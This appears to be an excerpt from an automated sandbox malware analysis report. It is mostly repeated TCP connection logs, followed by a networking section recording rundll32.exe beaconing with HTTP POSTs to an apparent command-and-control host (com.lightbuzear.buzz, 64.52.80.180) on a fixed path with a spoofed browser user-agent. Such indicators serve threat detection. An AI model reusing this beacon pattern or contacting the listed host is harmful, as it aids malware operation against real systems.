Source: global trafficTCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49192 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49193 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49195 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49195 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49195 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49195 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49195 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49195 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49195 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49195 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49195 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49199 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49199 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49199 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49199 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49199 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49199 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49199 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49199 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49199 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49200 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49200 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49200 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49200 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49200 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49200 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49200 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49200 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49200 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49200 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49201 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49201 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49201 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49201 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49201 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49201 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49201 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49201 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49201 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49201 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49202 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49202 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49202 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49202 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49202 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49202 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49202 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49202 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49202 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49203 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49203 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49203 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49203 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49203 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49203 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49203 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49203 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49203 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49204 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49204 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49204 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49204 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49204 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49204 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49204 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49204 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49204 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49204 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49205 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49205 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49205 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49205 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49205 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49205 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49205 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49205 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49205 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49206 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49206 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49206 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49206 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49206 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49206 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49206 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49206 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49206 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49206 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49207 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49207 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49207 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49207 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49207 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49207 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49207 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49207 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49207 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49207 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49208 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49208 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49208 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49208 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49208 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49208 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49208 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49208 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49208 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49209 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49209 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49209 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49209 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49209 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49209 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49209 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49209 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49209 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49209 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49210 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49210 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49210 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49210 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49210 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49210 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49210 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49210 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49210 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49210 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49211 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49211 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49211 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49211 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49211 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49211 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49211 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49211 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49211 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49211 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49211 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49212 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49212 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49212 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49212 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49212 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49212 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49212 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49212 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49212 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49212 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49213 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49213 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49213 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49213 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49213 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49213 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49213 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49213 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49213 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49213 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49214 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49214 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49214 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49214 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49214 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49214 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49214 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49214 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49214 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49214 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49215 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49215 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49215 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49215 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49215 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49215 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49215 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49215 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49215 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49215 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49216 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49216 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49216 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49216 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49216 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49216 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49216 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49216 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49216 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49216 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49216 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49217 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49217 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49217 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49217 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49217 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49217 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49217 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49217 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49217 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49217 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49218 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49218 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49218 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49218 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49218 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49218 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49218 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49218 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49218 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49219 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49219 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49219 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49219 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49219 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49219 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49219 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49219 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49219 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49219 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49220 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49220 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49220 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49220 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49220 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49220 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49220 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49220 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49220 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49220 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49221 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49221 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49221 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49221 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49221 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49221 -> 64.52.80.180:443
Source: global trafficTCP traffic: 192.168.2.22:49221 -> 64.52.80.180:443

Networking

barindex
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 142.250.185.228 443
Source: C:\Windows\System32\rundll32.exeDomain query: com.lightbuzear.buzz
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 64.52.80.180 443
Source: C:\Windows\System32\rundll32.exeDomain query: www.google.com
Source: Joe Sandbox ViewASN Name: WINDSTREAMUS WINDSTREAMUS
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.Google.comContent-Length: 0Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.Google.comContent-Length: 0Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.Google.comContent-Length: 0Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
